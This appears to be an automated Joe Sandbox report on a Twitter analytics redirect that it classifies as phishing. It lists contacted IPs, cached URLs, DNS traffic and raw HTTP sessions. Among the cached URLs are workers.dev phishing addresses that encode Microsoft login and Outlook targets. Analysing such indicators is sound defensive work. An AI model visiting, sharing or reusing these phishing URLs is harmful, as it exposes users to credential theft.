https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://github.com/jquery/globalize	chromecache_145.2.dr	false		high
https://npms.io/search?q=ponyfill.	chromecache_161.2.dr	false		high
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5s	chromecache_110.2.dr	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/jsdisabled	chromecache_139.2.dr, chromecache_110.2.dr	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9vdXRsb29r	chromecache_110.2.dr	false	Avira URL Cloud: safe	unknown
https://github.com/hgoebl/mobile-detect.js	chromecache_123.2.dr	false		high
http://feross.org	chromecache_130.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.253.124.101	clients.l.google.com	United States	15169	GOOGLEUS	false
172.67.135.172	khanmotiozpisx.ellieb7.workers.dev	United States	13335	CLOUDFLARENETUS	false
172.217.215.106	www.google.com	United States	15169	GOOGLEUS	false
13.107.213.38	part-0010.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.96.165.194	LYH-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.167.114	rkugxtvgxusbsfrtcv.kute.pw	United States	13335	CLOUDFLARENETUS	false
172.67.140.157	unknown	United States	13335	CLOUDFLARENETUS	false
13.107.213.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.177.122.156	cm.g.doubleclick.net	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.21.57.22	niakallzodamiozxza.pixiepowder00.workers.dev	United States	13335	CLOUDFLARENETUS	false
104.244.42.67	s.twitter.com	United States	13414	TWITTERUS	false
104.244.42.197	t.co	United States	13414	TWITTERUS	false
172.67.176.237	smsmail.net	United States	13335	CLOUDFLARENETUS	false
199.36.158.100	rullbullpullpushcndapp.web.app	United States	15169	GOOGLEUS	false
13.107.213.36	part-0008.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.9.84	accounts.google.com	United States	15169	GOOGLEUS	false
104.16.126.175	unpkg.com	United States	13335	CLOUDFLARENETUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1389674
Start date and time:	2024-02-09 11:08:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.win@23/114@42/22
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://khanmotiozpisx.ellieb7.workers.dev/ Browse: https://khanmotiozpisx.ellieb7.workers.dev/

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 74.125.136.94, 34.104.35.123, 142.250.105.95, 52.165.165.26, 23.40.205.74, 23.40.205.18, 23.40.205.26, 192.229.211.108, 108.177.122.95, 172.217.215.95, 64.233.176.95, 64.233.185.95, 173.194.219.95, 142.250.9.95, 74.125.138.95, 64.233.177.95, 74.125.136.95, 172.253.124.95, 142.251.15.95, 20.242.39.171, 23.1.33.203, 23.1.33.196, 172.253.124.94, 72.21.81.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, wu.azureedge.net, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, e40491.dscg.akamaiedge.net, fs.microsoft.com, content-autofill.googleapis.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, wu-bg-shim.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, r4.res.office365.com.edgekey.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (31977)
Category:	downloaded
Size (bytes):	42600
Entropy (8bit):	5.463950276199159
Encrypted:	false
SSDEEP:	768:LinVZVtKylEz+M29GjpVJgh0GsZ2+9sQuRgsJDG3gvmCE:LinVzEGUxP
MD5:	5E18E3D4C35864304D38C3C284F6071B
SHA1:	B8D4F52EC6738FDCFCA4C0B25326E82F4C8BA70A
SHA-256:	7649E92AA760B806193241148E8B88F3BC12C4E6CFFBC35622A99477DB798242
SHA-512:	F8F0524916BA5A92BD2D531C01E1E14F13D8F54B5EA6F1F841C611FDAFD5FD2655CD0508D5576B6EF3ECEA050B598B1EF13B539941382B5B597D7F6F52A36F49
Malicious:	false
Reputation:	low
URL:	https://cdnjs.cloudflare.com/ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js
Preview:	!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.VeeValidate=t()}(this,function(){"use strict";function e(e){return e&&e.__esModule?e.default:e}function t(e,t){return t={exports:{}},e(t,t.exports),t.exports}var i={en:/^[A-Z]$/i,cs:/^[A-Z...............]$/i,da:/^[A-Z...]$/i,de:/^[A-Z....]$/i,es:/^[A-Z.......]$/i,fr:/^[A-Z................]$/i,nl:/^[A-Z......]$/i,hu:/^[A-Z.........]$/i,pl:/^[A-Z.........]$/i,pt:/^[A-Z.............]$/i,ru:/^[.-..]$/i,sr:/^[A-Z.....]$/i,tr:/^[A-Z.......]$/i,uk:/^[.-.....I..]$/i,ar:/^[.............................................]$/},n={en:/^[A-Z\s]$/i,cs:/^[A-Z...............\s]$/i,da:/^[A-Z...\s]$/i,de:/^[A-Z....\s]$/i,es:/^[A-Z.......\s]$/i,fr:/^[A-Z............

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2024 11:09:34.090224028 CET	61574	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:34.090536118 CET	53597	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:34.091310024 CET	50887	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:34.091716051 CET	62850	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:34.176920891 CET	53	51478	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:34.207736015 CET	53	61574	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:34.208026886 CET	53	53597	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:34.208389997 CET	53	50887	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:34.208842993 CET	53	62850	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:34.826004982 CET	53	62663	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:35.881524086 CET	57416	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:35.885127068 CET	62146	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:35.999074936 CET	53	57416	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:36.002296925 CET	53	62146	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:36.492657900 CET	63119	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:36.492995977 CET	50839	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:36.610053062 CET	53	50839	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:36.610285997 CET	53	63119	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:37.736135006 CET	55733	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:37.738173008 CET	55714	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:37.853528023 CET	53	55733	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:37.855691910 CET	53	55714	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:37.946245909 CET	49803	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:37.948174000 CET	56131	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:38.064292908 CET	53	49803	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:38.065419912 CET	53	56131	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:38.558818102 CET	54273	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:38.559223890 CET	60527	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:38.680886984 CET	53	60527	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:38.681468010 CET	53	54273	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:39.170033932 CET	50425	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:39.170357943 CET	61373	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:39.287484884 CET	53	61373	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:39.287595987 CET	53	50425	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:39.452704906 CET	54049	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:39.454364061 CET	50323	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:39.604095936 CET	53	54049	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:39.606523991 CET	53	50323	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:40.198004961 CET	61605	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:40.199263096 CET	54522	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:40.339899063 CET	53	61605	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:40.340702057 CET	53	54522	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:41.955292940 CET	59324	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:41.957231045 CET	49873	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:42.072659969 CET	53	59324	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:42.074925900 CET	53	49873	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:44.823843956 CET	63941	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:44.824105978 CET	62665	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:44.941095114 CET	53	63941	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:44.941517115 CET	53	62665	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:46.694933891 CET	53	63154	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:51.296924114 CET	49493	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:51.297072887 CET	60313	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:51.451580048 CET	53	49493	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:51.515862942 CET	53	60313	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:51.521066904 CET	53	52512	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:51.736303091 CET	53913	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:51.736886024 CET	58547	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:51.856900930 CET	53	53913	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:51.857605934 CET	53	58547	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:52.267926931 CET	53	61825	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:52.643779993 CET	55002	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:52.644309044 CET	55834	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:52.832158089 CET	53	55002	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:52.832494974 CET	53	55834	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:53.483285904 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:09:54.242734909 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:09:54.994769096 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:09:55.715127945 CET	55436	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:55.715866089 CET	63000	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:55.836827993 CET	53	55436	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:55.837568045 CET	53	63000	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:57.624272108 CET	59980	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:57.625545025 CET	55599	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:57.741952896 CET	53	59980	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:57.742651939 CET	53	55599	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:59.271507978 CET	50060	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:59.271507978 CET	52706	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:59.388905048 CET	53	50060	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:59.389271975 CET	53	52706	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:59.474107981 CET	51892	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:59.476454973 CET	62978	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:09:59.596348047 CET	53	51892	1.1.1.1	192.168.2.6
Feb 9, 2024 11:09:59.597975016 CET	53	62978	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:00.682200909 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:10:00.951742887 CET	58292	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:10:00.951996088 CET	59005	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:10:01.068957090 CET	53	58292	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:01.069498062 CET	53	59005	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:01.376967907 CET	53	62315	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:01.433451891 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:10:01.856899977 CET	58843	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:10:01.857666016 CET	62362	53	192.168.2.6	1.1.1.1
Feb 9, 2024 11:10:02.193953037 CET	137	137	192.168.2.6	192.168.2.255
Feb 9, 2024 11:10:11.640511036 CET	53	62255	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:33.632400036 CET	53	63694	1.1.1.1	192.168.2.6
Feb 9, 2024 11:10:34.924802065 CET	53	63303	1.1.1.1	192.168.2.6

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 9, 2024 11:09:50.391843081 CET	173.222.162.64	443	192.168.2.6	49698	CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US	CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Oct 18 22:32:40 CEST 2023 Wed Aug 12 02:00:00 CEST 2020	Fri Jun 28 01:59:59 CEST 2024 Fri Jun 28 01:59:59 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
Feb 9, 2024 11:09:50.391843081 CET	173.222.162.64	443	192.168.2.6	49698	CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Aug 12 02:00:00 CEST 2020	Fri Jun 28 01:59:59 CEST 2024		28a2c9bd18a11de089ef85a160da29e4

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:34 UTC	752	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-117.0.5938.134 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:34 UTC	731	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-XrWuAEm6I0qyFLfXYcbj4A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 09 Feb 2024 10:09:34 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6248 X-Daystart: 7774 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-09 10:09:34 UTC	521	IN	Data Raw: 32 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 34 38 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 37 37 37 34 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20 Data Ascii: 2c8<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6248" elapsed_seconds="7774"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2024-02-09 10:09:34 UTC	198	IN	Data Raw: 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 3f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2024-02-09 10:09:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:34 UTC	680	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
2024-02-09 10:09:34 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-02-09 10:09:34 UTC	1799	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 09 Feb 2024 10:09:34 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-WLBCXKgrrZJOc7WE8qkzHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmJw05BiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQFiIR6Oe5-nr2MT-HHmwE4mALpFGDk" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-09 10:09:34 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-02-09 10:09:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-02-09 10:09:36 UTC	1018	OUT	GET /mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true HTTP/1.1 Host: analytics.twitter.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-09 10:09:36 UTC	672	IN	HTTP/1.1 200 OK date: Fri, 09 Feb 2024 10:09:36 GMT perf: 7469935968 server: tsa_b set-cookie: guest_id=v1%3A170747337641474796; Max-Age=34214400; Expires=Tue, 11 Mar 2025 10:09:36 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None content-type: text/html;charset=utf-8 cache-control: no-cache, no-store, max-age=0 x-transaction: c67c441ff58736f8 content-length: 732 x-frame-options: SAMEORIGIN x-transaction-id: c67c441ff58736f8 x-xss-protection: 0 x-content-type-options: nosniff strict-transport-security: max-age=631138519 x-response-time: 5 x-connection-hash: 4a943352a83a6f5ab92251d249281ced84db7dde3497a04e8a489d3dfde6f9eb connection: close
2024-02-09 10:09:36 UTC	732	IN	Data Raw: 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 74 2e 63 6f 2f 4d 6e 48 33 51 46 6c 78 43 46 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 68 65 69 67 68 74 3d 22 31 22 20 77 69 64 74 68 3d 22 31 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 Data Ascii: <html> <head> <meta name="referrer" content="never"> <meta http-equiv="refresh" content="0;url=https://t.co/MnH3QFlxCF"> </head> <body> <img height="1" width="1" style="display:none;" alt="" src="https://cm.g.doubleclick.net/pixel?g

Timestamp	Bytes transferred	Direction	Data
